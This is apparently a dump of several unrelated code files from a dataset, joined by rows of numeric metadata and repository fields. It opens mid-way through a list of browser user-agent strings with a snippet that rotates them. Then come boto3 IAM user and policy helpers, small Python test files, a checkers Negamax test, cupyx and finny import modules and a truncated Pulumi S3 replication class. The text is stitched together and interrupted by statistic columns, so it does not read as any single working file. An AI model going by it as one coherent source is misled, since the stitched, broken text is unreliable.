(KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Opera/9.80 (Windows NT 
6.1; U; zh-cn) Presto/2.6.37 Version/11.00', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00', 'Mozilla/5.0 (X11; Linux i586; rv:63.0) Gecko/20100101 Firefox/63.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)']
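A short consumption sketch (not in the original file): rotating a random entry from the list as the User-Agent header of an outgoing request. The `requests` dependency and the target URL are assumptions for illustration.
import random
import requests

headers = {"User-Agent": random.choice(user_agents)}  # pick a random UA per request
response = requests.get("https://example.com", headers=headers, timeout=10)
print(response.status_code)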
| 1,451.913043
| 33,091
| 0.71974
| 6,726
| 33,394
| 3.555456
| 0.03479
| 0.092833
| 0.111023
| 0.199883
| 0.963536
| 0.958978
| 0.955716
| 0.949611
| 0.9466
| 0.944091
| 0
| 0.245578
| 0.102773
| 33,394
| 22
| 33,092
| 1,517.909091
| 0.552567
| 0.007786
| 0
| 0
| 0
| 300
| 0.962734
| 0.00761
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
6bc1b3e741bae2dce0d3ef56db36cfde2106cd53
| 181
|
py
|
Python
|
src/xapitrader/core/api/__init__.py
|
SarithT/xapitrader
|
0018bc37d9756a10c328def90d042ef39857cfb5
|
[
"MIT"
] | null | null | null |
src/xapitrader/core/api/__init__.py
|
SarithT/xapitrader
|
0018bc37d9756a10c328def90d042ef39857cfb5
|
[
"MIT"
] | null | null | null |
src/xapitrader/core/api/__init__.py
|
SarithT/xapitrader
|
0018bc37d9756a10c328def90d042ef39857cfb5
|
[
"MIT"
] | null | null | null |
from xapitrader.core.api.APIConnector import APIConnector
from xapitrader.core.api.APIStreamConnector import APIStreamConnector
from xapitrader.core.api.JsonSocket import JsonSocket
| 60.333333
| 69
| 0.889503
| 21
| 181
| 7.666667
| 0.380952
| 0.26087
| 0.335404
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060773
| 181
| 3
| 70
| 60.333333
| 0.947059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d424f4f5eec4d84d66604e145429f8704a71f94f
| 6,854
|
py
|
Python
|
ep3/iam_example.py
|
rahulwinx1985/python-for-cloud
|
6a311998fbf3712cc682b335730aea83062406ab
|
[
"MIT"
] | 3
|
2021-11-18T15:43:39.000Z
|
2022-01-23T14:09:57.000Z
|
ep3/iam_example.py
|
rahulwinx1985/python-for-cloud
|
6a311998fbf3712cc682b335730aea83062406ab
|
[
"MIT"
] | null | null | null |
ep3/iam_example.py
|
rahulwinx1985/python-for-cloud
|
6a311998fbf3712cc682b335730aea83062406ab
|
[
"MIT"
] | 27
|
2021-11-10T08:44:10.000Z
|
2022-03-30T08:19:46.000Z
|
import json
import boto3
from botocore.exceptions import ClientError
# Create IAM User
def create_iam_user(user_name):
try:
iam_client = boto3.client('iam')
response = iam_client.create_user(UserName=user_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
return False
else:
print("Unexpected error: %s" % e)
return False
return response
# responseObject = create_iam_user("SandipSimpleTest1")
# print(responseObject)
def list_iam_users():
try:
iam_client = boto3.client('iam')
paginator = iam_client.get_paginator('list_users')
for response in paginator.paginate():
#print(response["Users"])
for user in response["Users"]:
print("User name: ",user["UserName"])
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# list_iam_users()
def update_iam_user(existing_user_name, new_user_name):
try:
iam_client = boto3.client('iam')
iam_client.update_user(UserName=existing_user_name,
NewUserName=new_user_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# update_iam_user("SandipTest1", "SandipTest1Renamed")
# list_iam_users()
def delete_iam_user(existing_user_name):
try:
iam_client = boto3.client('iam')
iam_client.delete_user(UserName=existing_user_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# delete_iam_user("SandipTest1Renamed")
# list_iam_users()
def create_iam_policy(policy_name, policy_json):
try:
iam_client = boto3.client('iam')
iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=json.dumps(policy_json)
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
return False
else:
print("Unexpected error: %s" % e)
return False
return True
custom_policy_json = {
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"ec2:*"
],
"Resource": "*"
}]
}
#create_iam_policy("test_policy_1_by_sandip", custom_policy_json)
def attach_custom_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
account_id = sts.get_caller_identity()['Account']
policy_arn = f'arn:aws:iam::{account_id}:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.attach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# create_iam_user("sandip_poilcy_test_user_1")
# attach_custom_iam_policy_with_user("test_policy_1_by_sandip", "sandip_poilcy_test_user_1")
def attach_managed_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
policy_arn = f'arn:aws:iam::aws:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.attach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# attach_managed_iam_policy_with_user("AdministratorAccess", "sandip_poilcy_test_user_1")
def detach_custom_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
account_id = sts.get_caller_identity()['Account']
policy_arn = f'arn:aws:iam::{account_id}:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.detach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
#detach_custom_iam_policy_with_user("test_policy_1_by_sandip","sandip_poilcy_test_user_1")
def detach_managed_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
policy_arn = f'arn:aws:iam::aws:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.detach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
#detach_managed_iam_policy_with_user("AdministratorAccess", "sandip_poilcy_test_user_1")
def add_policy_to_role(role_name, policy_arn):
try:
iam_client = boto3.client('iam')
iam_client.attach_role_policy(
RoleName=role_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
def attach_custom_iam_policy_with_role(policy_name, role_name):
try:
sts = boto3.client('sts')
account_id = sts.get_caller_identity()['Account']
policy_arn = f'arn:aws:iam::{account_id}:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.attach_role_policy(
RoleName=role_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
def create_role(role_name, trust_document):
try:
iam_client = boto3.client('iam')
iam_client.create_role(
RoleName=role_name,
AssumeRolePolicyDocument=json.dumps(trust_document)
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
| 33.763547
| 92
| 0.620514
| 792
| 6,854
| 5.089646
| 0.113636
| 0.053585
| 0.041677
| 0.059539
| 0.803027
| 0.755396
| 0.736046
| 0.733069
| 0.72389
| 0.703548
| 0
| 0.007741
| 0.264955
| 6,854
| 203
| 93
| 33.763547
| 0.792378
| 0.105194
| 0
| 0.714286
| 0
| 0
| 0.196633
| 0.034652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.017857
| 0
| 0.125
| 0.14881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d45f6fe3eee5025cf0c403b9a4cab0d0aae39ac9
| 1,237
|
py
|
Python
|
skp_edu_docker/code/demo/api_basic_7_netconf_w2v.py
|
TensorMSA/hoyai_docker
|
12f0041e6306d8a6421585a4b51666bad30be442
|
[
"MIT"
] | 8
|
2017-06-16T00:19:12.000Z
|
2020-08-13T03:15:57.000Z
|
skp_edu_docker/code/demo/api_basic_7_netconf_w2v.py
|
TensorMSA/tensormsa_docker
|
12f0041e6306d8a6421585a4b51666bad30be442
|
[
"MIT"
] | 21
|
2017-06-09T10:15:14.000Z
|
2018-03-29T07:51:02.000Z
|
skp_edu_docker/code/demo/api_basic_7_netconf_w2v.py
|
TensorMSA/hoyai_docker
|
12f0041e6306d8a6421585a4b51666bad30be442
|
[
"MIT"
] | 4
|
2017-10-25T09:59:53.000Z
|
2020-05-07T09:51:11.000Z
|
import requests
import json, os
url = "{0}:{1}".format(os.environ['HOSTNAME'] , "8000")
nn_id = "nn00002"
wf_ver_id = "1"
# update source_info
# set netconf_node in NN_WF_NODE_INFO
resp = requests.put('http://' + url + '/api/v1/type/wf/state/netconf/detail/w2v/nnid/' + nn_id + '/ver/' + wf_ver_id + '/node/netconf_node/',
json={
"window_size" : 5,
"vector_size" : 100,
"batch_size" : 100,
"iter" : 5,
"min_count" : 0
})
data = json.loads(resp.json())
print("evaluation result : {0}".format(data))
nn_id = "nn00009"
wf_ver_id = "1"
# update source_info
# set netconf_node in NN_WF_NODE_INFO
resp = requests.put('http://' + url + '/api/v1/type/wf/state/netconf/detail/w2v/nnid/' + nn_id + '/ver/' + wf_ver_id + '/node/netconf_node/',
json={
"window_size" : 5,
"vector_size" : 300,
"batch_size" : 100,
"iter" : 5,
"min_count" : 0
})
data = json.loads(resp.json())
print("evaluation result : {0}".format(data))
| 33.432432
| 141
| 0.488278
| 147
| 1,237
| 3.891156
| 0.333333
| 0.027972
| 0.048951
| 0.027972
| 0.84965
| 0.84965
| 0.84965
| 0.84965
| 0.84965
| 0.84965
| 0
| 0.05303
| 0.359741
| 1,237
| 37
| 142
| 33.432432
| 0.669192
| 0.088116
| 0
| 0.740741
| 0
| 0
| 0.289146
| 0.081851
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d45f94ab19264256f7790828665c9a07ec75a8a3
| 171
|
py
|
Python
|
tests/test_gatherup.py
|
nmstoker/gatherup
|
38f3a78079c29fc61be30ee88c44755edbe5c784
|
[
"MIT"
] | 9
|
2020-08-06T00:55:08.000Z
|
2022-01-05T06:33:58.000Z
|
tests/test_gatherup.py
|
domcross/gatherup
|
d06d5f3c06b5cb21de66ec2fe256b5efd588a76f
|
[
"MIT"
] | 4
|
2020-08-06T00:29:11.000Z
|
2020-10-10T20:01:53.000Z
|
tests/test_gatherup.py
|
domcross/gatherup
|
d06d5f3c06b5cb21de66ec2fe256b5efd588a76f
|
[
"MIT"
] | 1
|
2020-10-04T17:20:28.000Z
|
2020-10-04T17:20:28.000Z
|
from gatherup import *
def test_indent_text_no_indent_specified():
assert indent_text('indent this text') == ' indent this text'
# ADD SOME MEANINGFUL TESTS HERE!!!
| 24.428571
| 65
| 0.748538
| 24
| 171
| 5.083333
| 0.666667
| 0.163934
| 0.229508
| 0.295082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 171
| 6
| 66
| 28.5
| 0.847222
| 0.192982
| 0
| 0
| 0
| 0
| 0.264706
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d47a81a9cbdca02c61be92d0489a361c9f4a7135
| 397
|
py
|
Python
|
tests/internal/free_tier_eligible/test_free_tier_eligible_false_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/free_tier_eligible/test_free_tier_eligible_false_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/free_tier_eligible/test_free_tier_eligible_false_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module free_tier_eligible.false
import pytest
import ec2_compare.internal.free_tier_eligible.false
def test_get_internal_data_free_tier_eligible_false_get_instances_list():
assert len(ec2_compare.internal.free_tier_eligible.false.get_instances_list()) > 0
def test_get_internal_data_free_tier_eligible_false_get():
assert len(ec2_compare.internal.free_tier_eligible.false.get) > 0
| 39.7
| 84
| 0.866499
| 62
| 397
| 5.048387
| 0.322581
| 0.153355
| 0.306709
| 0.402556
| 0.827476
| 0.827476
| 0.827476
| 0.619808
| 0.619808
| 0.619808
| 0
| 0.013477
| 0.065491
| 397
| 9
| 85
| 44.111111
| 0.830189
| 0.098237
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
00f92333fb9ec9168a30330e2c29fc1a24de5076
| 1,932
|
py
|
Python
|
test/T_Negamax.py
|
jrinder42/Checkers-AI
|
63f409c19b52d7e17268b21abab5cfed15ca0642
|
[
"MIT"
] | null | null | null |
test/T_Negamax.py
|
jrinder42/Checkers-AI
|
63f409c19b52d7e17268b21abab5cfed15ca0642
|
[
"MIT"
] | null | null | null |
test/T_Negamax.py
|
jrinder42/Checkers-AI
|
63f409c19b52d7e17268b21abab5cfed15ca0642
|
[
"MIT"
] | null | null | null |
# Testing Negamax Algorithm
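# NOTE: this test script uses Python 2 syntax (bare print statements and raw_input
# in the interactive move loop below).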
from Negamax import Negamax, Negamax_AB
def test():
'currently no error checking for valid user moves'
N = Negamax()
board = N.init_board()
player = True
while not N.game_over(board):
if player: # black - AI
print N.generate_black_moves(board)
N.negamax(board, 2, 1) # -N.negamax(board, 2, -1)
#N.negamax(board, 3, float('-inf'), float('inf'), 1)
move = N.BEST_MOVE
board = N.move_black(board, *move)
N.print_board(board)
player = False
else:
print N.generate_white_moves(board)
i = int(raw_input("Enter piece i: "))
j = int(raw_input("Enter piece j: "))
i_new = int(raw_input("Enter new i: "))
j_new = int(raw_input("Enter new j: "))
board = N.move_white(board, (i, j), (i_new, j_new))
N.print_board(board)
player = True
def test_ab():
'currently no error checking for valid user moves'
N = Negamax_AB()
board = N.init_board()
player = True
while not N.game_over(board):
if player: # black - AI
print N.generate_black_moves(board)
#N.negamax(board, 2, 1) # -N.negamax(board, 2, -1)
N.negamax(board, 3, float('-inf'), float('inf'), 1)
move = N.BEST_MOVE
board = N.move_black(board, *move)
N.print_board(board)
player = False
else:
print N.generate_white_moves(board)
i = int(raw_input("Enter piece i: "))
j = int(raw_input("Enter piece j: "))
i_new = int(raw_input("Enter new i: "))
j_new = int(raw_input("Enter new j: "))
board = N.move_white(board, (i, j), (i_new, j_new))
N.print_board(board)
player = True
if __name__ == '__main__':
test()
# test_ab()
| 31.16129
| 64
| 0.538302
| 263
| 1,932
| 3.764259
| 0.190114
| 0.064646
| 0.088889
| 0.129293
| 0.905051
| 0.905051
| 0.905051
| 0.905051
| 0.905051
| 0.905051
| 0
| 0.009346
| 0.335404
| 1,932
| 62
| 65
| 31.16129
| 0.761682
| 0.09265
| 0
| 0.808511
| 0
| 0
| 0.127794
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021277
| null | null | 0.170213
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2e4406d2935597e25c906d158e1d8ccd2a945e93
| 1,227
|
py
|
Python
|
cupyx/scipy/special/__init__.py
|
prkhrsrvstv1/cupy
|
ea86c8225b575af9d2855fb77a306cf86fd098ea
|
[
"MIT"
] | 6,180
|
2016-11-01T14:22:30.000Z
|
2022-03-31T08:39:20.000Z
|
cupyx/scipy/special/__init__.py
|
prkhrsrvstv1/cupy
|
ea86c8225b575af9d2855fb77a306cf86fd098ea
|
[
"MIT"
] | 6,281
|
2016-12-22T07:42:31.000Z
|
2022-03-31T19:57:02.000Z
|
cupyx/scipy/special/__init__.py
|
prkhrsrvstv1/cupy
|
ea86c8225b575af9d2855fb77a306cf86fd098ea
|
[
"MIT"
] | 829
|
2017-02-23T05:46:12.000Z
|
2022-03-27T17:40:03.000Z
|
from cupyx.scipy.special._bessel import i0 # NOQA
from cupyx.scipy.special._bessel import i1 # NOQA
from cupyx.scipy.special._bessel import j0 # NOQA
from cupyx.scipy.special._bessel import j1 # NOQA
from cupyx.scipy.special._bessel import y0 # NOQA
from cupyx.scipy.special._bessel import y1 # NOQA
from cupyx.scipy.special._polygamma import polygamma # NOQA
from cupyx.scipy.special._digamma import digamma # NOQA
from cupyx.scipy.special._gamma import gamma # NOQA
from cupyx.scipy.special._gammaln import gammaln # NOQA
from cupyx.scipy.special._zeta import zeta # NOQA
from cupyx.scipy.special._statistics import ndtr # NOQA
from cupyx.scipy.special._erf import erf # NOQA
from cupyx.scipy.special._erf import erfc # NOQA
from cupyx.scipy.special._erf import erfcx # NOQA
from cupyx.scipy.special._erf import erfinv # NOQA
from cupyx.scipy.special._erf import erfcinv # NOQA
from cupyx.scipy.special._convex_analysis import entr # NOQA
from cupyx.scipy.special._convex_analysis import huber # NOQA
from cupyx.scipy.special._convex_analysis import kl_div # NOQA
from cupyx.scipy.special._convex_analysis import pseudo_huber # NOQA
from cupyx.scipy.special._convex_analysis import rel_entr # NOQA
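# --- Illustrative usage sketch (not part of the original __init__.py): the re-exported
# --- functions operate on CuPy arrays on a CUDA device, mirroring scipy.special, e.g.:
# import cupy as cp
# from cupyx.scipy import special
# special.erf(cp.asarray([0.0, 1.0]))   # approx. array([0., 0.8427]) computed on the GPU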
| 43.821429
| 69
| 0.798696
| 184
| 1,227
| 5.163043
| 0.179348
| 0.208421
| 0.324211
| 0.486316
| 0.813684
| 0.655789
| 0.621053
| 0.247368
| 0.105263
| 0
| 0
| 0.005618
| 0.129584
| 1,227
| 27
| 70
| 45.444444
| 0.883895
| 0.088835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e83e5a2917d3edb55bb4fad2f172f89b90c7faa
| 117
|
py
|
Python
|
finny/views/__init__.py
|
hurrycane/finny
|
aff6e1c480426976cfee02b3c1d3e6ae9c196f81
|
[
"MIT"
] | null | null | null |
finny/views/__init__.py
|
hurrycane/finny
|
aff6e1c480426976cfee02b3c1d3e6ae9c196f81
|
[
"MIT"
] | null | null | null |
finny/views/__init__.py
|
hurrycane/finny
|
aff6e1c480426976cfee02b3c1d3e6ae9c196f81
|
[
"MIT"
] | null | null | null |
from .restful_view import ResourceBuilder
from .restful_view import Resource
from .restful_view import ModelResource
| 29.25
| 41
| 0.871795
| 15
| 117
| 6.6
| 0.466667
| 0.333333
| 0.454545
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 117
| 3
| 42
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cf87c53a2a22f53e7de815e9542aee10e7c7812d
| 23,152
|
py
|
Python
|
sdk/python/pulumi_aws/s3/bucket_replication_config.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_replication_config.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_replication_config.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BucketReplicationConfigArgs', 'BucketReplicationConfig']
@pulumi.input_type
class BucketReplicationConfigArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
role: pulumi.Input[str],
rules: pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]):
"""
The set of arguments for constructing a BucketReplicationConfig resource.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "role", role)
pulumi.set(__self__, "rules", rules)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
The name of the source S3 bucket you want Amazon S3 to monitor.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def rules(self) -> pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]:
"""
Set of configuration blocks describing the rules managing the replication documented below.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]):
pulumi.set(self, "rules", value)
@pulumi.input_type
class _BucketReplicationConfigState:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rules: Optional[pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]] = None):
"""
Input properties used for looking up and filtering BucketReplicationConfig resources.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
